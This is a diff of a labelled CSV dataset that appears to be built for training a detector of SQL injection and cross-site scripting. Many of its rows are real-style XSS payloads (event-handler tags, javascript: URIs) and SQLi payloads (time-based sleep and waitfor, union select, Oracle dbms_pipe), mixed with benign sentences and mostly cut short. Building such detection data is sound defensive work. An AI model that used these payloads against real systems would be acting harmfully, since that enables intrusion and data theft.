onpointerup=alert(1)>XSS</tfoot>,1,XSS,1895 -"1"" where 3740 = 3740 rlike sleep ( 5 ) #",2,SQLi,18604 -"{""id"":null,""firstName"":""Helen"",""lastName"":""Luo"",""s",0,normal,26954 --9622' ) ) ) order by 1#,2,SQLi,13859 -1' ) where 2763 = 2763,2,SQLi,14416 -<style>@keyframes slidein {}</style><select style=,1,XSS,6045 -"1 ) ) as gcvw where 7363 = 7363 or row ( 1045,7562",2,SQLi,15053 -And data protection for a select elite doesn't sou,0,normal,26368 --4184' ) ) ) or 2579 = 4654#,2,SQLi,18233 -<track id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,5393 -1 ) where 1100 = 1100 and sleep ( 5 ) --,2,SQLi,18391 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,22132 -1' rlike ( select ( case when ( 5567 = 5586 ) then,2,SQLi,20482 -1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||,2,SQLi,16717 -"1%"" or sleep ( 5 ) and ""%"" = """,2,SQLi,19822 -select name from syscolumns where id = (sele ...,2,SQLi,10173 -Where to insert this value?,0,normal,23440 -<button onDrop=javascript:alert(1)>,1,XSS,9610 -"<stylesheet xmlns=""http://www.w3.org/TR/WD-xsl"">",1,XSS,9309 -"1%' ) ) union all select null,null,null#",2,SQLi,16619 -"-4033' ) ) or 1570 = convert ( int, ( select char ",2,SQLi,22013 -"{""id"":null,""name"":""American Alsatian""}",0,normal,27055 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10731 +"<shadow draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,4190 +") , waitfor delay '0:0:__TIME__'--",2,SQLi,11828 +select * from users where id = 1 or \<\ union sele,2,SQLi,11724 +<style>:target {color:red;}</style><dd id=x style=,1,XSS,7255 +"<br ondblclick=""alert(1)"">test</br>",1,XSS,6401 +"1 ) ) ) union all select null,null,null,null#",2,SQLi,22246 +1' ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113,2,SQLi,15935 +1'+ ( select 'ples' where 4244 = 4244 procedure an,2,SQLi,15861 +-8982'+ ( select anyd where 5358 = 5358 union all ,2,SQLi,21019 +"1"" ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240",2,SQLi,21527 +1 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||,2,SQLi,18725 +Select a technique for painting.,0,normal,24252 +Select copy.,0,normal,24603 +"-8038' ) ) or elt ( 1032 = 1032,3623 ) and ( ( 'xf",2,SQLi,18444 +"select * from users where id = 1 or ""@#"" or 1 = 1 ",2,SQLi,12015 +"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,22110 +"<strong ondblclick=""alert(1)"">test</strong>",1,XSS,1748 +1'|| ( select 'fbtm' where 1335 = 1335 and exp ( ~,2,SQLi,20285 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11083 +1' ) or exp ( ~ ( select * from ( select concat ( ,2,SQLi,17657 +"1%"" ) ) and sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,19415 +1 ) ) as wwys where 9248 = 9248,2,SQLi,22408 +"<del oncopy=""alert(1)"" contenteditable>test</del>",1,XSS,3958 +"{""id"":null,""firstName"":""Su"",""lastName"":""Krishnan"",",0,normal,26870 +<tbody onpointerover=alert(1)>XSS</tbody>,1,XSS,3431 +"<style>@keyframes x{}</style><applet style=""animat",1,XSS,4684 +Select tequila.,0,normal,24517 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8405 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,14241 +<meta id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,4750 +"-2783' where 1494 = 1494 union all select 1494,149",2,SQLi,15932 +<canvas onblur=alert(1) tabindex=1 id=x></canvas><,1,XSS,6305 +"<element oncopy=""alert(1)"" contenteditable>test</e",1,XSS,5495 +1' ) ) as vwua where 8099 = 8099 union all select ,2,SQLi,12810 +1'+ ( select 'mgrj' where 8514 = 8514 or row ( 104,2,SQLi,16298 +))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) ,2,SQLi,11202 +Determine values where required.,0,normal,23339 +%20'sleep%2050',2,SQLi,10110 +select,0,normal,26574 +Up to extra $50 off select HP Products with Doorbu,0,normal,25201 +<animatemotion onpointerdown=alert(1)>XSS</animate,1,XSS,5831 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10641 +savepoint,0,normal,23166 +"<caption oncopy=""alert(1)"" contenteditable>test</c",1,XSS,7354 +<plaintext onpointerover=alert(1)>XSS</plaintext>,1,XSS,6932 +1 ) ) as bsvo where 3605 = 3605,2,SQLi,20056 +<hgroup onpointermove=alert(1)>XSS</hgroup>,1,XSS,7239 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,20690 +"-5169"" ) ) union all select 6198,6198,6198,6198--",2,SQLi,20274 +`'><script>\xF0\x90\x96\x9Ajavascript:alert(517)</,1,XSS,8994 +1' ) ) ) and 8312 = dbms_pipe.receive_message ( ch,2,SQLi,20064 +"<source onmousedown=""alert(1)"">test</source>",1,XSS,4864 +)%20waitfor%20delay%20'0:0:20'%20/*,2,SQLi,10847 +<small onfocusout=alert(1) tabindex=1 id=x></small,1,XSS,6911 +"1"" ) where 7513 = 7513 and row ( 6237,7469 ) > ( s",2,SQLi,16507 +"1"" ) ) ) procedure analyse ( extractvalue ( 5840,c",2,SQLi,12873 +1' ) as xvcr where 6456 = 6456 and 3824 = benchmar,2,SQLi,12439 +select ( case when ( 9732 = 7136 ) then 9732 else ,2,SQLi,13494 +"<picture><source srcset=""validimage.png""><img onlo",1,XSS,8584 +1,0,normal,26690 +These users can switch back and forth from regular,0,normal,25321 +"<sup oncopy=""alert(1)"" contenteditable>test</sup>",1,XSS,8253 +<iframe// src=javaSCRIPT&colon;alert(1),1,XSS,1259 +<html onpointerdown=alert(1)>XSS</html>,1,XSS,6683 +"<abbr draggable=""true"" ondrag=""alert(1)"">test</abb",1,XSS,8933 +"select sleep ( 5 ) and ( ( ""rthl"" like ""rthl",2,SQLi,17524 +1'+ ( select 'qzcx' where 9524 = 9524 and elt ( 30,2,SQLi,16323 +"<IMG SRC='vbscript:msgbox(""XSS"")'>",1,XSS,271 +"<dialog onkeydown=""alert(1)"" contenteditable>test<",1,XSS,2824 +"<rb draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,1975 +"{""id"":null,""firstName"":""Jacqueline"",""lastName"":""Ta",0,normal,27185 +"1"" union all select null,null,null,null,null#",2,SQLi,13631 +"1' and 2388 = benchmark ( 5000000,md5 ( 0x6d457153",2,SQLi,14636 +"1"" and elt ( 1210 = 1210,sleep ( 5 ) )",2,SQLi,16279 +"1"" ) ) and 9800 = 8713",2,SQLi,16654 +1 ) ) as emtf where 3561 = 3561 or ( select * from,2,SQLi,18429 +<style>:target {color: red;}</style><picture id=x ,1,XSS,2772 +1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ),2,SQLi,20271 +<rp onpointermove=alert(1)>XSS</rp>,1,XSS,2331 +"<iframe draggable=""true"" ondragend=""alert(1)"">test",1,XSS,5938 +"<img/id=""alert('XSS')\""/alt=\""/\""src=\""/\""onerror=",1,XSS,9470 +"1' ) ) ) and 3202 = like ( 'abcdefg',upper ( hex (",2,SQLi,15442 +"<small draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,7994 +"<figcaption oncut=""alert(1)"" contenteditable>test<",1,XSS,1896 +"1"" ) ) as luon where 4676 = 4676 rlike sleep ( 5 )",2,SQLi,18602 +"{""id"":null,""firstName"":""Darry"",""lastName"":""Ng"",""sp",0,normal,26951 +"1"" ) ) and ( select 2* ( if ( ( select * from ( se",2,SQLi,13861 +"1"" where 8918 = 8918 ( select ( case when ( 4587 =",2,SQLi,14418 +"<style onkeyup=""alert(1)"" contenteditable>test</st",1,XSS,6047 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,15055 +"{""id"":null,""firstName"":""Han"",""lastName"":""Tan"",""add",0,normal,27192 +1 ) where 2940 = 2940,2,SQLi,18231 +"<td onbeforecut=""alert(1)"" contenteditable>test</t",1,XSS,5395 +1 ) and ( 2342 = 3620 ) *3620,2,SQLi,18389 +"1"" and elt ( 4594 = 1040,1040 )",2,SQLi,20905 +1' ) ) ) or 8156 = ( select count ( * ) from gener,2,SQLi,19620 +-3862' ) or 9323 = 9323#,2,SQLi,16715 +1' where 1895 = 1895 or 5286 = ( select count ( * ,2,SQLi,19820 +*(|(mail=*)),2,SQLi,10175 +1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ,2,SQLi,19887 +<button onError=javascript:alert(1)>,1,XSS,9612 +<svg onload=(alert)(1)>,1,XSS,9311 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,16621 +"{""id"":null,""firstName"":""Shirley"",""lastName"":""Lim"",",0,normal,27472 +Where's the remote?,0,normal,23487 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10733 `'><script>\xE2\x80\x89javascript:alert(1)</script,1,XSS,563 -OR 3409=3409 AND ('pytW' LIKE 'pytW,2,SQLi,10209 -"&lt;t&#58;set attributeName=\""innerHTML\"" to=\""XSS",1,XSS,1032 -Select a book for your leisure.,0,normal,23995 -"The commissioners, ten in number, were directed to",0,normal,25473 -"<bdi onmouseover=""alert(1)"">test</bdi>",1,XSS,7059 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10600 -<em onpointerdown=alert(1)>XSS</em>,1,XSS,4378 -select,0,normal,26565 -"1"" where 4066 = 4066 and updatexml ( 3393,concat (",2,SQLi,22301 --5113' ) ) ) or 7200 = 3094--,2,SQLi,21213 -"<xmp draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,6977 -I'm planning to pick up some supplies.,0,normal,23867 -"1"" and 6637 = 2321",2,SQLi,17960 -Then scroll down to Viewing Restrictions and selec,0,normal,25345 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11103 -"Open the browser and select ""Chrome"" on the upper ",0,normal,25813 -"<IFRAME width=""420"" height=""315"" frameborder=""0"" o",1,XSS,1250 -1' ) where 6408 = 6408,2,SQLi,21873 -Please select one option.,0,normal,24295 -1) WAITFOR DELAY '0:0:5' AND (1337=1337,2,SQLi,11323 -1' ) where 3572 = 3572,2,SQLi,13072 -One needs to select all atoms in the cage - these ,0,normal,25825 -Beginning with not too many stocks he can test the,0,normal,26327 -"1%"" union all select null,null#",2,SQLi,13346 -)%20or%20('x'='x,2,SQLi,10058 -Order a large latte.,0,normal,22619 -"As a speaker, he was clear, logical and impressive",0,normal,26354 -1\'1,2,SQLi,11059 -1'|| ( select 'nfgq' where 1837 = 1837 and char ( ,2,SQLi,20497 -Select the best camera settings for photography.,0,normal,24167 --6218' ) ) or 2236 = 4469#,2,SQLi,13752 -select ( case when ( 2751 = 8206 ) then 2751 else ,2,SQLi,19959 -"<style>@keyframes x{}</style><bgsound style=""anima",1,XSS,7045 -"elt ( 8192 = 8192,sleep ( 5 ) )",2,SQLi,18600 -Select a cozy corner.,0,normal,22702 -"?page=javascript:alert(1)""",1,XSS,9878 -Filter the spam messages.,0,normal,22609 -Select a strategy for the game.,0,normal,24156 -"1 or elt ( 6272 = 6272,sleep ( 5 ) ) # klaw",2,SQLi,19381 -"1%"" and ( select 2* ( if ( ( select * from ( selec",2,SQLi,13312 -"1' ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171",2,SQLi,21108 -<style>:target {color:red;}</style><article id=x s,1,XSS,4542 -Select your chat.,0,normal,24906 -Select the best option.,0,normal,24333 -"1,iif ( 1440 = 4612,1,1/0 )",2,SQLi,13666 -<meta onfocusout=alert(1) tabindex=1 id=x></meta><,1,XSS,7961 -1' ) union all select null--,2,SQLi,14441 -1'|| ( select 'mgel' where 3591 = 3591 and 6055 = ,2,SQLi,19488 -"1%"" ) ) union all select null,null#",2,SQLi,14987 -<image id=x tabindex=1 onfocusin=alert(1)></image>,1,XSS,7442 -"<q onmouseup=""alert(1)"">test</q>",1,XSS,6256 -1 ) ) as kycl where 8008 = 8008 or 8384 = like ( ',2,SQLi,12697 -"A select guide to cultural events for children, te",0,normal,26417 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8595 -1 where 2267 = 2267 and 6537 = dbms_pipe.receive_m,2,SQLi,15356 -To save a spreadsheet select File Save or click th,0,normal,25259 -1' ) where 1369 = 1369 and 4840 = 1697#,2,SQLi,17367 +HAVING 1=1,2,SQLi,10211 +&lt;/BODY&gt;&lt;/HTML&gt;,1,XSS,1033 +"1' ) ) and 4241 = convert ( int, ( select char ( 1",2,SQLi,19866 +"The company therefore promotes a bill, which is co",0,normal,25470 +<button id=x tabindex=1 ondeactivate=alert(1)></bu,1,XSS,7061 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10602 +"<style>@keyframes x{}</style><audio style=""animati",1,XSS,4380 +"waitfor delay '0:0:5' and ( ( ""zili"" like ""zili",2,SQLi,17301 +1' where 2162 = 2162 procedure analyse ( extractva,2,SQLi,22299 +"select pg_sleep ( 5 ) and ( ( ""qani"" = ""qani",2,SQLi,21211 +"<dd draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,6979 +Where's the perfect place to do some stargazing?,0,normal,23864 +"{""id"":null,""firstName"":""Marinah"",""lastName"":""Maman",0,normal,26961 +waitfor delay '0:0:5' and ( ( ( 'hrta' = 'hrta,2,SQLi,17339 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11105 +Open the Preview app on your Mac and select the fi,0,normal,25810 +"<iframe src=""&Tab;javascript:prompt(1)&Tab;"">",1,XSS,1251 +"1"" and 8312 = dbms_pipe.receive_message ( chr ( 69",2,SQLi,21871 +password,0,normal,23170 +)) WAITFOR DELAY '0:0:5'--,2,SQLi,11325 +"1"" waitfor delay '0:0:5' and ""dvfr"" like ""dvfr",2,SQLi,13074 +"{""id"":null,""name"":""Purrloin""}",0,normal,27215 +Berg explained so clearly why he wanted to collect,0,normal,26324 +-8328 or 2724 in ( ( char ( 113 ) +char ( 113 ) +c,2,SQLi,13348 +; execute immediate 'sel' || 'ect us' || 'er',2,SQLi,10060 +Join the dance class.,0,normal,22616 +"As for the color, you might want to select some sw",0,normal,26351 +or username is not NULL or username = ',2,SQLi,11061 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20495 +1%' ) and 6510 = ( select count ( * ) from sysuser,2,SQLi,17914 +"-2071 union all select 4753,4753--",2,SQLi,13754 +-2530%' order by 1#,2,SQLi,19957 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7047 +"-1510' ) ) ) union all select 8755,8755,8755,8755,",2,SQLi,18598 +Insert the SIM card tray.,0,normal,22699 +or ''-',2,SQLi,9880 +1'+ ( select pdfv where 1172 = 1172 and updatexml ,2,SQLi,22386 +Select the suitable lighting for the room.,0,normal,24153 +1 ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) |,2,SQLi,19379 +-7054 ) as gzvf where 9146 = 9146 or 3038 = 3038,2,SQLi,13314 +1,0,normal,26687 +<rp id=x tabindex=1 onbeforeactivate=alert(1)></rp,1,XSS,4544 +Select your communication.,0,normal,24903 +Select the best moment.,0,normal,24330 +"1%"" ) ) or 7417 = ( select count ( * ) from sysibm",2,SQLi,13668 +<dfn id=x tabindex=1 onfocusin=alert(1)></dfn>,1,XSS,7963 +"-3379 ) union all select 4985,4985,4985,4985,4985,",2,SQLi,14443 +"{""id"":null,""firstName"":""Jayden"",""lastName"":""Goh"",""",0,normal,27485 +-9145' ) as xyya where 8950 = 8950 union all selec,2,SQLi,14989 +<li id=x tabindex=1 onactivate=alert(1)></li>,1,XSS,7444 +<bgsound onpointerdown=alert(1)>XSS</bgsound>,1,XSS,6258 +1 ) as attr where 8085 = 8085 and 9254 = ( select ,2,SQLi,12699 +Get up to 75% off select styles through Nov. 24.,0,normal,26144 +"<font oncut=""alert(1)"" contenteditable>test</font>",1,XSS,8597 +1' where 8837 = 8837 and 5556 = ( select count ( *,2,SQLi,15358 +to select something,0,normal,25256 +"iif ( 9007 = 3836,1,1/0 )",2,SQLi,17365 "<xss draggable=""true"" ondragstart=""alert(1)"" style",1,XSS,66 -1' ) and 7533 = 7533 and ( 'xyga' like 'xyga,2,SQLi,20346 -Select a hiking trail to hike.,0,normal,24232 -Select your goal.,0,normal,24840 -"<audio onmousedown=""alert(1)"">test</audio>",1,XSS,6186 -1'+ ( select 'zugq' where 9218 = 9218,2,SQLi,17220 -"-8454"" or 6872 = 6872",2,SQLi,21442 -"1%"" and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ",2,SQLi,13557 -Filter the noisy data.,0,normal,22567 --2604 ) ) as sekb where 6897 = 6897 or 1000 = 7683,2,SQLi,20991 -"I still don't want you to cut up your clothes, but",0,normal,26066 -<object data=/ onload=alert(1)>,1,XSS,5114 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,13427 -‘ or 1 = 1 --,2,SQLi,22487 -"-2178' ) ) ) or elt ( 3421 = 2899,2899 ) and ( ( (",2,SQLi,16920 -"<small onkeyup=""alert(1)"" contenteditable>test</sm",1,XSS,7513 -1' ) as tqdg where 9355 = 9355,2,SQLi,19099 -1' ) and 5556 = ( select count ( * ) from all_user,2,SQLi,20279 -"-7776' ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr",2,SQLi,20489 -"<command onpaste=""alert(1)"" contenteditable>test</",1,XSS,8001 -1 ) ) or 5356 = ( select count ( * ) from sysusers,2,SQLi,16060 +"{""id"":null,""name"":""Carbink""}",0,normal,26921 +Select a design.,0,normal,24831 +Select your captain.,0,normal,24837 +<plaintext onpointerenter=alert(1)>XSS</plaintext>,1,XSS,6188 +1 ) ) ) and 9198 = 9198--,2,SQLi,17218 +"1"" ) where 9062 = 9062",2,SQLi,21440 +1'+ ( select 'jtvq' where 8288 = 8288 and ( select,2,SQLi,13559 +She'll join the meeting.,0,normal,22564 +"-6368 ) ) union all select 4646,4646,4646,4646,464",2,SQLi,20989 +I want to choose a theme for the party.,0,normal,23915 +onFocus(),1,XSS,5116 +"1', ( select ( case when ( 6948 = 4654 ) then 1 el",2,SQLi,13429 +Select your contract.,0,normal,24949 +Order a large latte.,0,normal,22619 +"<object onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,7515 +"1' ) ) ) union all select null,null#",2,SQLi,21809 +"-8200' where 3422 = 3422 or 1570 = convert ( int, ",2,SQLi,20277 +-4256' ) where 9545 = 9545 or 5023 = ctxsys.driths,2,SQLi,20487 +<b onpointerup=alert(1)>XSS</b>,1,XSS,8003 +"1' in boolean mode ) union all select null,null,nu",2,SQLi,16062 "<xss onkeyup=""alert(1)"" contenteditable style=disp",1,XSS,74 -"<hr draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,1844 +"<summary onpaste=""alert(1)"" contenteditable>test</",1,XSS,1845 <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080,1,XSS,771 -) RLIKE SLEEP(5) AND ('1337' LIKE '1337,2,SQLi,11229 -1 rlike sleep ( 5 ) #,2,SQLi,14680 -select,0,normal,26557 -"[a]('javascript:alert(""1"")')",1,XSS,9437 -Choose fields where needed.,0,normal,23259 -select case when 2930 = 7964 then 1 else null end-,2,SQLi,16244 -"iif ( 2205 = 4764,1,1/0 )",2,SQLi,17213 -In 1757 Voltaire came to reside at Lausanne; and a,0,normal,26027 --7103 ) ) or 4610 = 1871 and ( ( 1249 = 1249,2,SQLi,13407 -1' ) as mgko where 1828 = 1828 and make_set ( 8403,2,SQLi,19998 -"<noframes onbeforecut=""alert(1)"" contenteditable>t",1,XSS,5939 -%3Cx onxxx=alert(1),1,XSS,9680 -"{""id"":null,""firstName"":""Luke"",""lastName"":""Yiin"",""s",0,normal,26982 --7230' ) or 2724 in ( ( char ( 113 ) +char ( 113 ),2,SQLi,17315 -"<frame oncontextmenu=""alert(1)"">test</frame>",1,XSS,4028 -Select the right angle for the shot.,0,normal,24185 -1' ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 1,2,SQLi,16057 -"-5509%"" ) ) ) union all select 7066,7066,7066,7066",2,SQLi,14378 -`'><script>\xC2\xA0javascript:alert(537)</script>,1,XSS,8975 -<colgroup id=x tabindex=1 onfocus=alert(1)></colgr,1,XSS,5898 -<iframe id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,3964 -"<small onmouseover=""alert(1)"">test</small>",1,XSS,3938 -"<u onbeforepaste=""alert(1)"" contenteditable>test</",1,XSS,4415 -"1 ) where 9012 = 9012 and 3202 = like ( 'abcdefg',",2,SQLi,17780 -"<output onmouseup=""alert(1)"">test</output>",1,XSS,3147 -"1' and row ( 6237,7469 ) > ( select count ( * ) ,c",2,SQLi,20019 -Let's decide where to go for a spa retreat.,0,normal,23818 -"<p ondblclick=""alert(1)"">test</p>",1,XSS,7508 -"-2216"" ) where 6692 = 6692 union all select 6692,6",2,SQLi,16529 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10768 -<del id=x tabindex=1 ondeactivate=alert(1)></del><,1,XSS,6193 -or 1=1 --,2,SQLi,9991 -"<style>@keyframes x{}</style><p style=""animation-n",1,XSS,3515 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7273 -"-2790%"" ) union all select 5070,5070#",2,SQLi,20157 -"<IMG SRC=x onmouseup=""alert(String.fromCharCode(88",1,XSS,1204 -"1"" ) where 8098 = 8098",2,SQLi,19834 -<img src=x:alert(alt) onerror=eval(src) alt=xss>,1,XSS,9692 -1' ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ,2,SQLi,18596 -<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x7,1,XSS,9412 -<meta id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,5256 -"<var onmouseup=""alert(1)"">test</var>",1,XSS,5958 -In the United States the same question was conside,0,normal,25990 -1'|| ( select 'rttq' from dual where 7368 = 7368 o,2,SQLi,12109 -1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) |,2,SQLi,15679 -1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ),2,SQLi,18747 -1%' ) ) and 3721 = 2597#,2,SQLi,21099 -"&lt;A HREF=\""//google\""&gt;XSS&lt;/A&gt;",1,XSS,1056 -"1"" and 8189 = ( select count ( * ) from sysibm.sys",2,SQLi,13881 -1'|| ( select 'ywjy' where 7579 = 7579,2,SQLi,17724 -&<script>document.vulnerable=true;</script>,1,XSS,1526 -Where did you find that beautiful flower?,0,normal,22920 -Where's your SQL source?,0,normal,23417 -<noscript onpointerover=alert(1)>XSS</noscript>,1,XSS,5155 -1' ) ) ) or 5286 = ( select count ( * ) from all_u,2,SQLi,12895 -"-2013"" ) ) as kisy where 3802 = 3802 or 5903 = ( '",2,SQLi,14127 -"<section onmouseleave=""alert(1)"">test</section>",1,XSS,5665 -"select sleep ( 5 ) and ( ( ( ""zlal"" = ""zlal",2,SQLi,22103 -1'+ ( select wkay where 5476 = 5476 and char ( 120,2,SQLi,16410 -1 ) where 8813 = 8813,2,SQLi,19621 -"1"" where 9332 = 9332 union all select null,null,nu",2,SQLi,15552 -Up to 40% off select smart and electronic door loc,0,normal,25208 -"<style>@keyframes x{}</style><header style=""animat",1,XSS,2971 -"1', ( select ( case when ( 5141 = 5141 ) then ( as",2,SQLi,19988 -<form id=x tabindex=1 onfocus=alert(1)></form>,1,XSS,7000 -"1"" ) where 7578 = 7578 and 6414 = ( select count (",2,SQLi,16466 +))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337,2,SQLi,11231 +"1"" and 6240 = ( 'qqpjq'|| ( select case 6240 when ",2,SQLi,14682 +"{""id"":null,""name"":""action""}",0,normal,27257 +"![a](https://www.google.com/image.png""onload=""aler",1,XSS,9439 +"1"" ) ) as qrok where 8257 = 8257 or 8421 = ( selec",2,SQLi,20207 +1 ) as crsd where 5271 = 5271 waitfor delay '0:0:5,2,SQLi,16246 +revoke,0,normal,23168 +In 1818 a select committee of the House of Commons,0,normal,26024 +"1 ) ) ) and 4241 = convert ( int, ( select char ( ",2,SQLi,13409 +The Utilities Select Sector SPDR (XLU) and Real Es,0,normal,25361 +<style>:target {color:red;}</style><isindex id=x s,1,XSS,5941 +"<svg xmlns=http://www.w3.org/2000/svg"" onload=""ale",1,XSS,9682 +"{""id"":null,""name"":""Breloom""}",0,normal,26979 +"-5054%"" ) ) ) union all select 8263,8263,8263,8263",2,SQLi,21608 +"<span onkeydown=""alert(1)"" contenteditable>test</s",1,XSS,4030 +Select the right time for the meeting.,0,normal,24182 +-4410 where 5749 = 5749 or 1317 = 9823--,2,SQLi,16059 +1'+ ( select cjcp where 2590 = 2590 union all sele,2,SQLi,14380 +`'><script>\xE2\x80\x82javascript:alert(532)</scri,1,XSS,8977 +"<slot onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,5900 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3966 +<b id=x tabindex=1 ondeactivate=alert(1)></b><inpu,1,XSS,3940 +"<legend draggable=""true"" ondragend=""alert(1)"">test",1,XSS,4417 +"-5630"" ) or 3038 = 3038",2,SQLi,17778 +"<li onmouseout=""alert(1)"">test</li>",1,XSS,3149 +"1%"" and exp ( ~ ( select * from ( select concat ( ",2,SQLi,20017 +Where did you learn about that ancient artifact fr,0,normal,23815 +<wbr id=x tabindex=1 onfocusin=alert(1)></wbr>,1,XSS,7510 +1' ) as afnt where 4719 = 4719 and elt ( 8224 = 12,2,SQLi,16531 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10770 +<style>:target {color: red;}</style><tfoot id=x st,1,XSS,6195 +") or ""1""=""1",2,SQLi,9993 +<style>:target {transform: rotate(180deg);}</style,1,XSS,3517 +"<menu draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,7275 +1'|| ( select 'vdeo' where 4355 = 4355,2,SQLi,20155 +"<IMG SRC=x onmousewheel=""alert(String.fromCharCode",1,XSS,1205 +"1"" or 4915 = ( select count ( * ) from domain.doma",2,SQLi,19765 +"><img src=x onerror=alert(String.fromCharCode(88,8",1,XSS,9694 +Where's your SQL input?,0,normal,23419 +"[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNT",1,XSS,9414 +"<Video> <source onerror = ""javascript: alert ()"">",1,XSS,5258 +<wbr id=x tabindex=1 onactivate=alert(1)></wbr>,1,XSS,5960 +"Ine legislates ""with the counsel and with the teac",0,normal,25987 +"1' ) where 9842 = 9842 union all select null,null,",2,SQLi,12111 +1'|| ( select 'xuof' from dual where 8794 = 8794 o,2,SQLi,15681 +"1"" ) as jqli where 7793 = 7793",2,SQLi,18745 +"1"" ) ) ( select ( case when ( 4587 = 4587 ) then r",2,SQLi,21097 +"&lt;A HREF=\""http&#58;//ha&#46;ckers&#46;org@googl",1,XSS,1057 +"-7485"" ) ) as caob where 4100 = 4100 union all sel",2,SQLi,13883 +Where's the mall?,0,normal,23505 +<img src=&{document.vulnerable=true;};>,1,XSS,1527 +Delete unnecessary files from your computer.,0,normal,22917 +Select colors that match the teddy bear you choose,0,normal,25640 +"<li ondblclick=""alert(1)"">test</li>",1,XSS,5157 +begin dbms_lock.sleep ( 5 ),2,SQLi,12897 +-7971' union all select 4273#,2,SQLi,14129 +"<content oncontextmenu=""alert(1)"">test</content>",1,XSS,5667 +"1"" ) ) or ( select 2* ( if ( ( select * from ( sel",2,SQLi,22101 +-7624' ) or 5903 = ( 'qqpjq'|| ( select case 5903 ,2,SQLi,16412 +"end and ( ( ""dmgj"" = ""dmgj",2,SQLi,19619 +-8641%' order by 1--,2,SQLi,15554 +Up to 45% off select Milwaukee Power Tools and Acc,0,normal,25205 +"<rt onclick=""alert(1)"">test</rt>",1,XSS,2972 +"1"" ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ""cw",2,SQLi,19986 +<span onpointermove=alert(1)>XSS</span>,1,XSS,7002 +1' ) as hwpf where 5603 = 5603,2,SQLi,16468 "<a href=""\x18javascript:javascript:alert(1)"" id=""f",1,XSS,494 -"<style>@keyframes x{}</style><xmp style=""animation",1,XSS,8665 -if ( 7899 = 7899 ) select 7899 else drop function ,2,SQLi,15581 -"-1408 ) ) union all select 5715,5715,5715,5715,571",2,SQLi,16121 -1' ) ) as iuta where 1482 = 1482,2,SQLi,13802 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10483 -"<bgsound oncopy=""alert(1)"" contenteditable>test</b",1,XSS,6027 -<hgroup onpointermove=alert(1)>XSS</hgroup>,1,XSS,7239 -Insert the link.,0,normal,22865 -"-5571' union all select 8846,8846,8846,8846,8846,8",2,SQLi,21566 +"<rtc onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,8667 +1'|| ( select 'ativ' from dual where 4746 = 4746 u,2,SQLi,15583 +1' ) as tsge where 6970 = 6970,2,SQLi,16123 +"1 ) and 3202 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,13804 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10485 +<param id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,6029 +"<map draggable=""true"" ondrag=""alert(1)"">test</map>",1,XSS,7241 +Update the post.,0,normal,22862 +1'|| ( select 'gdzt' where 4950 = 4950,2,SQLi,21564 "{""id"":null,""name"":""grow sat""}",0,normal,27613 -(select*from(select(sleep(5)))a),2,SQLi,11142 -"<li 